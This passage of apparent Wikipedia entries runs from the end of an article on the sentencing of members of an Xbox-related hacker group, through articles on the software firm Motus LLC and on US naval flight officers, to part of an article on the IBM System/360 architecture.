Members Four members of the group have pleaded guilty to charges. David Pokora, the first foreign hacker ever to be sentenced on United States soil, received an 18-month prison term on April 23, 2014 and was released in July 2015. Nathan LeRoux and Sanad Odeh Nesheiwat were sentenced on June 11 and received 24 months and 18 months respectively; Austin Alcala was due for sentencing in July, though he went on to cooperate with the FBI in resolving another criminal case involving the illegal trade of FIFA coins. Dylan Wheeler (referred to in the indictment as D.W), currently out of reach of the United States, lived in Australia at the time and was charged with a varying degree of charges. He was not convicted, having fled from Australia to Dubai and eventually the Czech Republic over human rights and political issues with his trial from where he can’t be extradited since he holds Czech citizenship, and is currently living in the UK. His mother, Anna Wheeler, was later jailed for more than two years for helping him flee Australia to avoid criminal charges. Wheeler alleges that a sixth member, Justin May (referred to as "Person A"), worked with the FBI "to bring down the group". May had previously been placed on pre-trial probation for an earlier offense involving data theft, the agreement of which required him to stay off Xbox Live. He came under renewed interest from the FBI in 2017 after they seized a new BMW coupe and $38,595 in cash that was hidden throughout his home. In June 2021, May was sentenced to seven years in prison for defrauding over 3.5 million dollars from several tech companies, among them Microsoft and Cisco Systems, by exploiting warranty policies to illegitimately receive replacements which were then sold online. References 2011 crimes 2012 crimes 2013 crimes Hacker groups Hacking in the 2010s Microsoft Xbox
53024887
https://en.wikipedia.org/wiki/Motus%2C%20LLC
Motus, LLC
Motus is a workforce management company headquartered in Boston, Massachusetts that develops fleet management software. History Motus was founded in 2004 as Corporate Reimbursement Services, Inc. (CRS) by Gregg Darish, and changed its name to Motus in 2014. Craig Powell (businessman) currently serves as President and CEO. In August 2014, Motus released an integration with American cloud computing company Salesforce.com to instantly associate business stops with accounts, contacts and leads in the Salesforce customer relationship management (CRM) product. In 2015, Motus announced an integration with American travel management company Concur Technologies to allow employees to submit mileage to Motus, calculate individual reimbursement amounts, and automatically create expense reports in Concur Expense for manager approval. In September 2015, Motus released an integration with Oracle Corporation to instantly associate Motus administrative activities with Oracle customer relationship management (CRM) software. In 2018, Motus was acquired by private equity and growth capital firm Thoma Bravo, LLC and merged with Runzheimer, creating the leading provider of mileage reimbursement technologies serving the nation's most complex transportation companies. It also partnered with FleetCor Technologies, Inc., which provides fuel cards and workforce payment products and services. In September 2019, Motus acquired the Danvers, Massachusetts based mobile expense management firm Wireless Analytics. In September 2020, Motus acquired the Augusta, Georgia firm, Vision Wireless, further strengthening their mobile expense management services. Recognition Motus was named one of the 20 Most Promising Field Service Solution Providers by CIOReview, Top 10 Fleet Management Solution Providers by Logistics Tech Outlook, and Best Employee Efficiency Technology by MITX in 2017. It also won a 2018 HRO Today TekTonic Award in the Mobile category. The company has been named among the best places to work in Boston and Milwaukee, company of the year, and one of the largest mobile technology companies in Massachusetts. References See also Business mileage reimbursement rate Tax deduction Vehicle miles traveled tax 2004 establishments in Massachusetts Software companies established in 2004 Companies based in Boston Business software companies Human resource management software Software companies based in Massachusetts 2018 mergers and acquisitions Private equity portfolio companies Software companies of the United States
1029605
https://en.wikipedia.org/wiki/Naval%20flight%20officer
Naval flight officer
A naval flight officer (NFO) is a commissioned officer in the United States Navy or United States Marine Corps who specializes in airborne weapons and sensor systems. NFOs are not pilots (naval aviators), but they may perform many "co-pilot" functions, depending on the type of aircraft. Until 1966, their duties were performed by both commissioned officer and senior enlisted naval aviation observers (NAO). In 1966, enlisted personnel were removed from naval aviation observer duties but continued to serve in enlisted aircrew roles, while NAO officers received the newly established NFO designation, and the NFO insignia was introduced. NFOs in the US Navy begin their careers as unrestricted line officers (URL), eligible for command at sea and ashore in the various naval aviation aircraft type/model/series (T/M/S) communities and, at a senior level, in command of carrier air wings and aircraft carriers afloat and functional air wings, naval air stations and other activities ashore. They are also eligible for promotion to senior flag rank positions, including command of aircraft carrier strike groups, expeditionary strike groups, joint task forces, numbered fleets, naval component commands and unified combatant commands. A small number of US Navy NFOs have later opted for a lateral transfer to the restricted line (RL) as aeronautical engineering duty officers (AEDO), while continuing to retain their NFO designation and active flight status. Such officers are typically graduates of the U.S. Naval Test Pilot School and/or the U.S. Naval Postgraduate School with advanced academic degrees in aerospace engineering or similar disciplines. AEDO/NFOs are eligible to command test and evaluation squadrons, naval air test centers, naval air warfare centers, and hold major program management responsibilities within the Naval Air Systems Command (NAVAIR). Similarly, Marine Corps NFOs are also considered eligible for command at sea and ashore within Marine aviation, and are also eligible to hold senior general officer positions, such as command of Marine aircraft wings, Marine air-ground task forces (MAGTFs), joint task forces, Marine expeditionary forces, Marine Corps component commands and unified combatant commands. The counterpart to the NFO in the United States Air Force is the combat systems officer (CSO), encompassing the previous roles of navigator, weapon systems officer and electronic warfare officer. Although NFOs in the Navy's E-2 Hawkeye aircraft perform functions similar to the USAF air battle manager in the E-3 Sentry AWACS aircraft, their NFO training track is more closely aligned with that of USAF combat systems officers. The United States Coast Guard had a short-lived NFO community in the 1980s and 1990s when it operated E-2C Hawkeye aircraft on loan from the Navy. Following a fatal mishap with one of these aircraft at the former Naval Station Roosevelt Roads, Puerto Rico, the Coast Guard returned the remaining E-2Cs to the Navy and disestablished its NFO program. Training Overview Training for student NFOs (SNFOs) starts out the same as for student naval aviators (SNAs), with the same academic requirements and nearly identical physical requirements. The only real distinction is in physical requirements: SNFOs may have less than 20/40 uncorrected distance vision. Both SNAs and SNFOs go through the same naval introductory flight evaluation before splitting off into different primary training tracks. The SNFO program has continued to evolve since the 1960s. Today, SNFOs train under the Undergraduate Military Flight Officer (UMFO) program at Training Air Wing 6 at NAS Pensacola, alongside foreign students from various NATO, Allied and Coalition navies and air forces. All Student NFOs begin primary training at Training Squadron TEN (VT-10), flying the T-6A Texan II trainer, eventually moving on to advanced training at Training Squadron 4 (VT-4) or Training Squadron 86 (VT-86). Upon graduation from their respective advanced squadron, students receive their "wings of gold" and are designated as naval flight officers. After winging, students conduct follow-on training at their respective fleet replacement squadron (FRS). NFO training squadrons Naval Introductory Flight Evaluation All SNFOs and SNAs start their aviation training with naval introductory flight evaluation (NIFE). NIFE consists of several phases: academics, ground school, flight training, and physiology. The academics portion spans three weeks and covers aerodynamics, engines, FAA rules and regulations, navigation, and weather. Academics phase is followed by one week of ground school. Every student then enrolls in one of two civilian flight schools located near NAS Pensacola. Students complete approximately 9 hours of flight training in a single engine aircraft. NIFE flights can be waived based on proficiency for students entering training with a private pilot license. After the flight phase, students will complete training in aerospace physiology, egress, and water & land survival. Primary After completing NIFE, all SNFOs report to VT-10 under Training Air Wing 6 to begin primary training. All training in VT-10 is done in the Beechcraft T-6A Texan II and consists of four phases (all phases consist of ground school, simulator events, and flight events): Familiarization phase (aircraft systems, emergency procedures, basic communication, take-off/landing, ELPs, spins, precision aerobatics, course rules) Instrument phase (instrument flight procedures, flight planning, voice communication) Operational navigation phase (visual flight procedures, tactical route construction, precision aerobatics) Formation phase (ground school and flights used to introduce formation flying, tactical maneuvers, parade sequence, etc.) After graduating from Primary, SNFOs will select between multi crew aviation or strike aviation. Students selected for land-based platforms (e.g., P-3 Orion, P-8 Poseidon, EP-3 Aries II, E-6 Mercury) will continue on to the advanced maritime command and control curriculum at VT-4. Those that select strike aviation will continue to Intermediate training and remain at VT-10. Primary 2 Primary 2 training is also done through VT-10. It is a much shorter syllabus and consists of two phases: Instrument phase (simulators and flights flown at a faster airspeed and used to bolster instrument procedures) Formation After graduating from Intermediate, SNFOs will select: E-2C/D Hawkeye Strike jet aircraft E-2C/D Hawkeye selectees will continue on to the advanced maritime command and control curriculum at VT-4, while jet selectees will continue to intermediate training and remain at VT-10. Intermediate SNFOs destined for carrier-based strike fighter and electronic attack aircraft remain in VT-10 and continue to fly in the T-6A Texan II. Training consists of four phases: Single ship instrument phase (building upon instrument procedures in primary 1 and 2, VFR pattern, GPS navigation) Section instrument phase (instrument flying in formation) Tactical formation phase (rendezvous, tactical formation, tail-chase) Section visual navigation phase (visual navigation flying in formation) Advanced maritime command and control After primary, students who have selected E-2s or land-based maritime aviation (P-3, P-8, EP-3, E-6) check into VT-4 for advanced maritime command and control (MC2) training. The MC2 program was developed to allow SNFOs to receive advanced platform-specific training while still at NAS Pensacola, and to receive their wings before progressing to their respective fleet replacement squadron (FRS) for training in their ultimate operational combat aircraft. All MC2 training is conducted in the Multi-Crew Simulator (MCS), a new simulator system that allows students to train independently, as a single-ship crew, or as a multi-ship mission. MC2 training has two phases: Core and Strand. Core SNFOs begin MC2 training in the "core" syllabus. These classes include a combination of SNFOs who are E-2C/D selectees and land-based maritime selectees. Training in this phase builds upon the instrument training from Primary and includes: Operational flight planning, instruments, and navigation (international flight rules and TACAN navigation) Communications and navigation systems (comm systems and INS, GPS, and RADAR theory and navigation) Sensor and link operations (RADAR, IFF, and IR theory and data link employment) Fleet operations Upon completion of core training, SNFOs who progressed to MC2 training from Primary 1 (land-based maritime selectees) will select their fleet platform. Their choices are: E-6B Mercury, P-3C Orion, EP-3E Aries II, and P-8A Poseidon. When platform selection is complete, all SNFOs remain at VT-4 for "strand" training. Strand Strand training is platform-specific training in VT-4 via the MCS, allowing SNFOs destined for the carrier-based E-2 community or the land-based P-3/P-8, EP-3 and E-6 communities to begin learning their responsibilities on their fleet aircraft. The development of this program relieves the associated fleet replacement squadrons from teaching SNFOs the basics of naval aviation and to focus more on advanced fleet tactics, thus providing the fleet with mission-capable NFOs. Upon completion of strand training, students receive their "wings of gold" and are aeronautically designated as naval flight officers. SNFOs progress through one or two of four strands, depending on what platform they select. The E-2 strand consists of: Airborne early warning (E-2 capabilities and mission overview) Air intercept control (airborne battlefield command and control, tactics, and strike techniques) The common navigation strand consists of: Publications and charts Overwater navigation and communication procedures Navigation logs The MPR strand consists of: Surface search and littoral surveillance (community overview, target identification, sensor employment) Electronic warfare and acoustic operations (EW introduction, sonar theory) Maritime patrol and reconnaissance (coordinated operations) The E-6 strand consists of: Communications and operations (community overview, operations, strategic command structure) Advanced strike SNFOs report to VT-86 and fly the T-45C Goshawk. Training consists of five phases: Contact phase (T-45 systems, emergency procedures, carrier operations, night operations, communications) Strike phase (air-to-ground radar, low level flying, mission planning, fuel awareness) Close air support phase (CAS procedures and communications) Basic fighter maneuver phase (BFM practice) All weather intercepts phase (air-to-air radar, air intercepts, GPS) After graduating from advanced strike training, Navy SNFOs will select: EA-18G Growler F/A-18F Super Hornet Marine SNFOs will select: F/A-18D Hornet Comparison with naval aviators Naval flight officers operate some of the advanced systems on board most multi-crew naval aircraft, and some may also act as the overall tactical mission commanders of single or multiple aircraft assets during a given mission. NFOs are not trained to pilot the aircraft, although they do train in some dual-control aircraft and are given the opportunity to practice "hands on controls" basic airmanship techniques. Some current and recently retired naval aircraft with side-by-side seating are also authorized to operate under dual-piloted weather minimums with one pilot and one NFO. However, in the unlikely event that the pilot of a single piloted naval aircraft becomes incapacitated, the crew would likely eject or bail out, if possible, as NFOs are not qualified to land the aircraft, especially in the carrier-based shipboard environment. NFOs serve as weapon systems officers (WSOs), electronic warfare officers (EWO), electronic countermeasures officers (ECMO), tactical coordinators (TACCO), bombardiers, and navigators. They can serve as aircraft mission commanders, although in accordance with the OPNAVINST 3710 series of instructions, the pilot in command, regardless of rank, is always responsible for the safe piloting of the aircraft. Many NFOs achieve flight/section lead, division lead, package lead, mission lead and mission commander qualification, even when the pilot of the aircraft does not have that designation. Often, a senior NFO is paired with a junior pilot (and vice versa). NFO astronauts have also flown aboard the Space Shuttle and the International Space Station as mission specialists and wear NFO-astronaut wings. Like their naval aviator counterparts, NFOs in both the Navy and Marine Corps have commanded aviation squadrons, carrier air wings, shore-based functional air wings and air groups, marine aircraft groups, air facilities, air stations, aircraft carriers, amphibious assault ships, carrier strike groups, expeditionary strike groups, Marine aircraft wings, Marine expeditionary forces, numbered fleets, and component commands of unified combatant commands. Three NFOs have reached four-star rank, one as a Marine Corps general having served as the Assistant Commandant of the Marine Corps, and the other two as Navy admirals, one having served as Vice Chief of Naval Operations before commanding U.S. Fleet Forces Command & U.S. Atlantic Fleet, U.S. Pacific Command (USPACOM) and U.S. Central Command (USCENTCOM), and the other having commanded U.S. Pacific Command, having previously commanded U.S. Pacific Fleet. Another former NFO who retrained and qualified as a Naval Aviator also achieved four-star rank as a Marine Corps general, commanded U.S. Strategic Command (USSTRATCOM) and later served as Vice Chairman of the Joint Chiefs of Staff (VCJCS). In some quarters, NFO careers may be viewed more restrictive than their Naval Aviator (e.g., pilot) counterparts. For example, NFOs only serve aboard multi-crew naval aircraft and as certain multi-crew aircraft are retired from the active inventory, NFOs can become displaced, as happened with the withdrawal of the A-6, EA-6B, F-4, F-14 and S-3 from active service. In addition, as avionics have become more advanced, the need for some multi-crew aircraft using one or more NFOs has been reduced. However, the majority of NFOs (as well as Naval Aviators) from aircraft being retired have historically been afforded the opportunity to transition to another aircraft platform, such as F-4 and F-14 transitions to the F/A-18D and F/A-18F, A-6 transitions to the EA-6B and S-3, S-3 transitions to the P-3/P-8, E-2 and F/A-18F, and EA-6B transitions to the EA-18G. Although it is true that Naval Aviators can also transition their piloting expertise into civilian careers as commercial airline pilots and that NFOs are not able to similarly translate their skills into this career field unless augmented by associated FAA pilot certificates, the military aviation career opportunities of NFOs remain on par with their Naval Aviator counterparts, as do their post-military career prospects in the civilian sector in defense, aviation & aerospace, as well as other career pursuits beyond that of commercial airline pilot. Notable NFOs Vice Admiral Walter E. "Ted" Carter Jr. became the 62nd superintendent of the U.S. Naval Academy on July 23, 2014. He graduated from the U.S. Naval Academy in 1981, was designated a Naval Flight Officer in 1982, and graduated from the U.S. Navy Fighter Weapons School (TOPGUN) in 1985. Carter's career as an aviator includes extensive time at sea, deploying around the globe in the F-4 Phantom II and the F-14 Tomcat. He has landed on 19 different aircraft carriers, to include all 10 of the Nimitz class carriers. Carter flew 125 combat missions in support of joint operations in Bosnia, Kosovo, Kuwait, Iraq and Afghanistan. He accumulated 6,150 flight hours in F-4, F-14, and F/A-18 aircraft during his career and safely completed 2,016 carrier-arrested landings, the record among all active and retired U.S. Naval Aviation designators. As a captain, Vice Admiral Richard Dunleavy was the first NFO to command an aircraft carrier, the (CV 43). He previously flew the A-3 Skywarrior, A-5 Vigilante, RA-5C Vigilante and A-6 Intruder. Later in his career, he was promoted to rear admiral and vice admiral, and was the first NFO to hold the since disestablished position of Deputy Chief of Naval Operations for Air Warfare (OP-05). He retired in 1993. Rear Admiral Stanley W. Bryant was the first NFO selected for the Navy's Nuclear Power Program as a Commander in 1986. As a Captain, he became the first NFO to command a nuclear aircraft carrier when he took command of U.S.S. Theodore Roosevelt (CVN 71) in July 1992. In his first posting following promotion to Flag rank, he became the first NFO and first carrier aviator to command the Iceland Defense Force in Keflavik, Iceland in 1994. He was the first NFO appointed to the position of Deputy Commander (then DCINC), Naval Forces Europe and retired from that position in 2001. Commander William P. Driscoll was the first NFO to become a flying ace, having achieved five aerial kills of VPAF fighter aircraft during the Vietnam War. Driscoll received the service's second-highest decoration, the Navy Cross, for his role in a 1972 dogfight with North Vietnamese MiGs. Driscoll separated from active duty in 1982 but remained in the United States Naval Reserve, flying the F-4 Phantom II and later the F-14 Tomcat in a Naval Air Reserve fighter squadron at NAS Miramar, eventually retiring in 2003 with the rank of Commander (O-5). Admiral William Fallon, an NFO who flew in the RA-5C Vigilante and the A-6 Intruder, was the first NFO to achieve four-star rank. As a three-star vice admiral, he was the first NFO to command a numbered fleet, the U.S. 2nd Fleet. He later served in four separate four-star assignments, to include command of two unified combatant commands. This included service as the 31st Vice Chief of Naval Operations from October 2000 to August 2003; the Commander, U.S. Fleet Forces Command and U.S. Atlantic Fleet from October 2003 to February 2005; Commander, U.S. Pacific Command (USPACOM) from February 2005 until March 2007; and Commander, U.S. Central Command (USCENTCOM) from March 2007 until his retirement in March 2008. Captain Dale Gardner was the first NFO to qualify and fly as a NASA Mission Specialist astronaut aboard the Space Shuttle Challenger on mission STS-8. He previously flew the F-14 Tomcat. He retired in 1990. Rear Admiral Benjamin Thurman Hacker was the first NFO flag officer, having been selected in 1980. He previously flew the P-2 Neptune and P-3 Orion. He retired in 1988. Admiral Harry B. Harris, Jr., was the last Commander, U.S. Pacific Command (USPACOM) prior to its re-designation as U.S. Indo-Pacific Command (USINDOPACOM). He was the first NFO from the land-based maritime patrol aviation community to command a numbered fleet, the U.S. 6th Fleet, and later commanded the U.S. Pacific Fleet. He is also the first member of the Navy's land-based maritime patrol aviation community, pilot or NFO, to promote to four-star rank. He previously flew the P-3C Orion and retired in 2018. Vice Admiral David C. Nichols was the deputy coalition air forces component commander (deputy CFACC) during Operation Enduring Freedom and Operation Iraqi Freedom. He was the first NFO to command the Naval Strike and Air Warfare Center, the second NFO to command a numbered fleet, the U.S. 5th Fleet, and was later deputy commander of U.S. Central Command. He previously flew the A-6 Intruder and retired in 2007. General William L. Nyland, USMC was the first Marine Corps NFO to achieve four-star rank as Assistant Commandant of the Marine Corps. As a lieutenant general, he was also the first NFO to serve as deputy commandant for aviation. He previously flew the F-4 Phantom II and the F/A-18 Hornet. He retired in 2005. Lieutenant General Terry G. Robling, USMC was the first Marine Corps NFO to command United States Marine Corps Forces, Pacific following an assignment as the deputy commandant for aviation. He previously flew the F-4 Phantom II and the F/A-18 Hornet. He retired in 2014. Vice Admiral Nora W. Tyson was the Commander, United States Third Fleet from 2015 to 2017, and previously Deputy Commander, U.S. Fleet Forces Command. She was the first female NFO to command a warship, the amphibious assault ship (LHD 5), and the first female naval officer to command an aircraft carrier strike group, Carrier Strike Group Two, aboard the (CVN 77). She previously flew the land-based EC-130Q Hercules and the E-6 Mercury TACAMO aircraft. She was the first woman to command a U.S. Navy fleet, the U.S. 3rd Fleet. She retired in 2017. Colonel John C. Church, Sr., USMC (Ret.) was the first NFO to command a Marine F-4 squadron. He commanded VFMA 115, the Silver Eagles, from 1983 to 1984. Colonel Church, "the Silver Fox", had served with VFMA 115 during the Vietnam War and he and his pilot Captain James "Rebel" Denton were shot down. Colonel Church amassed more than 500 missions in the F-4. Fleet Eligible fleet platforms for NFOs are as of December 2017 are as follows: E-2C/D Hawkeye F/A-18F Super Hornet F/A-18D Hornet (USMC only) EA-18G Growler EP-3E Aries II P-3C Orion P-8A Poseidon E-6B Mercury In the EA-18G Growler, NFOs are designated as electronic warfare officers (EWOs) and may also be mission commanders. In the E-2C Hawkeye and E-2D Advanced Hawkeye, NFOs are initially as designated radar officers (RO), then upgrade to air control officers (ACO) and finally to combat information center officers (CICO) and CICO/mission commanders (CICO/MC). In the E-6B Mercury, NFOs are initially designated as airborne communications officers (ACOs), then upgrade to combat systems officers (CSOs), and finally to mission commanders (CSO/MC). In the EP-3E Aries, NFOs are initially designated as navigators (NAV) and eventually upgrade to electronic warfare officer/signals evaluator (EWO SEVAL) and EWO/SEVAL/mission commander (SEVAL/MC). In the F/A-18F Super Hornet and F/A-18D Hornet, the NFO position is known as the weapon systems officer (WSO) and may also be mission commander qualified. In the P-3C Orion and P-8A Poseidon, the NFO is initially designated as a navigator/communicator (NAV/COM) and eventually upgrades to tactical coordinator TACCO and then TACCO/mission commander (TACCO/MC). A single USN or USMC NFO is assigned to the United States Navy Flight Demonstration Squadron, the Blue Angels, as "Blue Angel #8", the Events Coordinator. This is an operational flying billet for this officer and he or she flies the twin-seat F/A-18D "Blue Angel 7" aircraft (which replaced the F/A-18B previously used) with the team's advance pilot/narrator. They function as the advance liaison (ADVON) at all air show sites and the events coordinator provides backup support to the narrator during all aerial demonstrations. NFOs have also served as instructors in the twin-seat F-5F Tiger II at the Navy Fighter Weapons School (now part of the Naval Aviation Warfighting Development Center (NAWDC)) and as instructors in twin-seat F/A-18Bs in USN and USMC F/A-18 fleet replacement squadrons and the Navy Fighter Weapons School. They have also flown a number of USAF and NATO/Allied aircraft via the U.S. Navy's Personnel Exchange Program (PEP), to include, but not limited to, the USAF F-4 Phantom II, F-15E Strike Eagle and E-3 Sentry, the Royal Air Force Buccaneer S.2, Tornado GR1/GR1B/GR4/GR4A and Nimrod MR.2, and the Royal Canadian Air Force CP-140 Aurora. In all, the specific roles filled by an NFO can vary greatly depending on the type of aircraft and squadron to which an NFO is assigned. Past aircraft NFOs also flew in these retired aircraft, including as mission commander: EA-1F (formerly AD-5Q) Skyraider serving as electronic warfare officer/electronic countermeasures operator. A-3 (formerly A3D) Skywarrior (e.g., A-3B, EA-3B, ERA-3B, EKA-3B, TA-3B and VA-3B) serving as bombardier/navigator, navigator, electronic countermeasures/electronic warfare officer, and EWO signals evaluator. A-4 Skyhawk as students in the TA-4J, as TOPGUN adversary instructors in the TA-4F and TA-4J, as forward air controllers in the OA-4M (USMC only), and as electronic warfare officers in the EA-4F. A-5A (formerly A3J-1), A-5B (formerly A3J-2) and RA-5C (formerly A3J-3P) Vigilante serving as bombardier/navigator in the A-5A and A-5B and reconnaissance/attack navigator in the RA-5C. A-6 Intruder (e.g., A-6A, A-6B, A-6C, KA-6D, A-6E) serving as bombardier/navigator (USN + USMC). EA-6A Prowler serving as electronic countermeasures officer (USN + USMC). EA-6B Prowler serving as electronic countermeasures officer (USN + USMC). EA-7L Corsair II as electronic countermeasures officer. C-130F Hercules serving as navigator. EC-130Q Hercules "TACAMO" aircraft serving as navigator and airborne communications officer. LC-130 Hercules serving as navigator. E-1B (formerly WF-2) Tracer serving as radar intercept controllers. EC-121 (formerly WV-2 and WV-3) Warning Star as navigator and electronic warfare officer. EF-10 (formerly F3D-2Q) Skynight as electronic warfare officer (USMC only). F-4 Phantom II (e.g., F-4B, F-4J, F-4N, F-4S, EF-4B, EF-4J) serving as radar intercept officer (USN + USMC). EF-4B and EF-4J Phantom II serving as electronic warfare officer. RF-4B Phantom II serving as reconnaissance systems officer (USMC only). F-14 Tomcat (e.g., F-14A, F-14B, F-14D) serving as radar intercept officer. OV-10 Bronco (OV-10A, OV-10D, OV-10D+, OV-10G) serving as aerial observer and forward air controller (USMC only). SP-2E/H (formerly P2V-5 and P2V-7) Neptune (e.g., SP-2E, SP-2H, EP-2E, OP-2E, AP-2H, LP-2H) serving as tactical coordinator and navigator. SP-5B (formerly P5M) Marlin serving as tactical coordinator and navigator. RP-3A and RP-3D Orion serving as ocean project coordinator and navigator. S-3 Viking (S-3A and S-3B) serving as tactical coordinator (TACCO) and co-pilot/tactical coordinator (COTAC). ES-3A Shadow serving as electronic warfare officer and co-pilot/electronic warfare officer. WP-3A Orion serving as navigator. RP-3A and RP-3D Orion serving as navigator and ocean projects coordinator. EP-3J Orion serving as navigator and electronic warfare officer. P-3A, P-3B and P-3B TACNAVMOD Orion serving as tactical coordinator and navigator. NFOs have also served as instructors/mission commanders in since retired training aircraft such as the UC-45 Expeditor, T-29 Flying Classroom, several variants of the T-39 Sabreliner, the TC-4C Academe, T-47A Citation II and the USAF T-43A Bobcat. Popular culture One of key characters in the popular film Top Gun was LTJG Nick "Goose" Bradshaw, played by Anthony Edwards, an F-14 radar intercept officer (RIO) teamed with his pilot, LT Pete "Maverick" Mitchell, played by Tom Cruise. Several others were LTJG Ron "Slider" Kerner, RIO to LT Tom "Iceman" Kazansky; LT Sam "Merlin" Neills, LT Bill "Cougar" Cortell's RIO; and LTJG Leonard "Wolfman" Wolfe, LT Rick "Hollywood" Neven's RIO. LTJG Marcus "Sundown" Williams (played by Clarence Gilyard Jr.) is the RIO of LTJG Charles "Chipper" Piper (played by Adrian Pasdar) and served as Maverick's RIO right after the latter went back to operational flight status following the accident that led to Goose's death. In the film Flight of the Intruder, Willem Dafoe played LCDR Virgil "Tiger" Cole, who served as an A-6 B/N (bombardier/navigator) with his pilot, LT Jake "Cool Hand" Grafton, played by Brad Johnson. In the film Behind Enemy Lines, Owen Wilson played LT Chris Burnett, a weapon systems officer in an F/A-18F Super Hornet. See also Naval aviator insignia United States Marine Corps aviation List of United States Navy aircraft squadrons List of United States Marine Corps aircraft squadrons NATOPS Notes References United States naval aviation Combat occupations United States Navy job titles
28739443
https://en.wikipedia.org/wiki/IBM%20System/360%20architecture
IBM System/360 architecture
The IBM System/360 architecture is the model independent architecture for the entire S/360 line of mainframe computers, including but not limited to the instruction set architecture. The elements of the architecture are documented in the IBM System/360 Principles of Operation and the IBM System/360 I/O Interface Channel to Control Unit Original Equipment Manufacturers' Information manuals. Features The System/360 architecture provides the following features: 16 32-bit general-purpose registers 4 64-bit floating-point registers 64-bit processor status register (PSW), which includes a 24-bit instruction address 24-bit (16 MB) byte-addressable memory space Big-endian byte/word order A standard instruction set, including fixed-point binary arithmetic and logical instructions, present on all System/360 models (except the Model 20, see below). A commercial instruction set, adding decimal arithmetic instructions, is optional on some models, as is a scientific instruction set, which adds floating-point instructions. The universal instruction set includes all of the above plus the storage protection instructions and is standard for some models. The Model 44 provides a few unique instructions for data acquisition and real-time processing and is missing the storage-to-storage instructions. However, IBM offered a Commercial Instruction Set" feature that ran in bump storage and simulated the missing instructions. The Model 20 offers a stripped-down version of the standard instruction set, limited to eight general registers with halfword (16-bit) instructions only, plus the commercial instruction set, and unique instructions for input/output. The Model 67 includes some instructions to handle 32-bit addresses and "dynamic address translation", with additional privileged instructions to provide virtual memory. Memory Memory (storage) in System/360 is addressed in terms of 8-bit bytes. Various instructions operate on larger units called halfword (2 bytes), fullword (4 bytes), doubleword (8 bytes), quad word (16 bytes) and 2048 byte storage block, specifying the leftmost (lowest address) of the unit. Within a halfword, fullword, doubleword or quadword, low numbered bytes are more significant than high numbered bytes; this is sometimes referred to as big-endian. Many uses for these units require aligning them on the corresponding boundaries. Within this article the unqualified term word refers to a fullword. The original architecture of System/360 provided for up to 224 = 16,777,216 bytes of memory. The later Model 67 extended the architecture to allow up to 232 = 4,294,967,296 bytes of virtual memory. Addressing System/360 uses truncated addressing similar to that of the UNIVAC III. That means that instructions do not contain complete addresses, but rather specify a base register and a positive offset from the addresses in the base registers. In the case of System/360 the base address is contained in one of 15 general registers. In some instructions, for example shifts, the same computations are performed for 32-bit quantities that are not addresses. Data formats The S/360 architecture defines formats for characters, integers, decimal integers and hexadecimal floating point numbers. Character and integer instructions are mandatory, but decimal and floating point instructions are part of the Decimal arithmetic and Floating-point arithmetic features. Characters are stored as 8-bit bytes. Integers are stored as two's complement binary halfword or fullword values. Packed decimal numbers are stored as 1 to 16 8-bit bytes containing an odd number of decimal digits followed by a 4-bit sign. Sign values of hexadecimal A, C, E, and F are positive and sign values of hexadecimal B and D are negative. Digit values of hexadecimal A-F and sign values of 0-9 are invalid, but the PACK and UNPK instructions do not test for validity. Zoned decimal numbers are stored as 1 to 16 8-bit bytes, each containing a zone in bits 0-3 and a digit in bits 4-7. The zone of the rightmost byte is interpreted as a sign. Floating point numbers are only stored as fullword or doubleword values on older models. On the 360/85 and 360/195 there are also extended precision floating point numbers stored as quadwords. For all three formats, bit 0 is a sign and bits 0-7 are a characteristic (exponent, biased by 64). Bits 8-31 (8-63) are a hexadecimal fraction. For extended precision, the low order doubleword has its own sign and characteristic, which are ignored on input and generated on output. Instruction formats Instructions in the S/360 are two, four or six bytes in length, with the opcode in byte 0. Instructions have one of the following formats: RR (two bytes). Generally byte 1 specifies two 4-bit register numbers, but in some cases, e.g., SVC, byte 1 is a single 8-bit immediate field. RS (four bytes). Byte 1 specifies two register numbers; bytes 2-3 specify a base and displacement. RX (four bytes). Bits 0-3 of byte 1 specify either a register number or a modifier; bits 4-7 of byte 1 specify the number of the general register to be used as an index; bytes 2-3 specify a base and displacement. SI (four bytes). Byte 1 specifies an immediate field; bytes 2-3 specify a base and displacement. SS (six bytes). Byte 1 specifies two 4-bit length fields or one 8-bit length field; bytes 2-3 and 4-5 each specify a base and displacement. The encoding of the length fields is length-1. Instructions must be on a two-byte boundary in memory; hence the low-order bit of the instruction address is always 0. Program Status Word (PSW) The Program Status Word (PSW) contains a variety of controls for the currently operating program. The 64-bit PSW describes (among other things) the address of the current instruction being executed, condition code and interrupt masks. Load Program Status Word (LPSW) is a privileged instruction that loads the Program Status Word (PSW), including the program mode, protection key, and the address of the next instruction to be executed. LPSW is most often used to "return" from an interruption by loading the "old" PSW which is associated with the interruption class. Other privileged instructions (e.g., SSM, STNSM, STOSM, SPKA, etcetera) are available for manipulating subsets of the PSW without causing an interruption or loading a PSW; and one non-privileged instruction (SPM) is available for manipulating the program mask. Interruption system The architecture defines 5 classes of interruption. An interruption is a mechanism for automatically changing the program state; it is used for both synchronous and asynchronous events. There are two storage fields assigned to each class of interruption on the S/360; an old PSW double-word and a new PSW double-word. The processor stores the PSW, with an interruption code inserted, into the old PSW location and then loads the PSW from the new PSW location. This generally replaces the instruction address, thereby effecting a branch, and (optionally) sets and/or resets other fields within the PSW, thereby effecting a mode change. The S/360 architecture defines a priority to each interruption class, but it is only relevant when two interruptions occur simultaneously; an interruption routine can be interrupted by any other enabled interruption, including another occurrence of the initial interruption. For this reason, it is normal practice to specify all of the mask bits, with the exception of machine-check mask bit, as 0 for the "first-level" interruption handlers. "Second-level" interruption handlers are generally designed for stacked interruptions (multiple occurrences of interruptions of the same interruption class). Input/Output interruption An I/O interruptionPoOps occurs at the completion of a channel program, after fetching a CCW with the PCI bit set and also for asynchronous events detected by the device, control unit or channel, e.g., completion of a mechanical movement. The system stores the device address into the interruption code and stores channel status into the CSW at location 64 ('40'X). Program interruption A Program interruption occurs when an instruction encounters one of 15 exceptions; however, if the Program Mask bit corresponding to an exception is 0 then there is no interruption for that exception. On 360/65, 360/67 and 360/85 the Protection Exception and Addressing Exception interruptions can be imprecise, in which case they store an Instruction Length Code of 0. The Interruption code may be any of An operation exceptionPoOps is recognized when a program attempts to execute an instruction with an opcode that the computer does not implement. In particular, an operation exception is recognized when a program is written for an optional feature, e.g., floating point, that is not installed. A privileged operation exceptionPoOps is recognized when a program attempts to execute a privileged instruction when the problem state bit in the PSW is 1. An execute exceptionPoOps is recognized when the operand of an EXECUTE instruction (EX) is another EXECUTE instruction. A protection exceptionPoOps is recognized when a program attempts to store into a location whose storage protect key does not match the PSW key, or to fetch from a fetch protected location whose 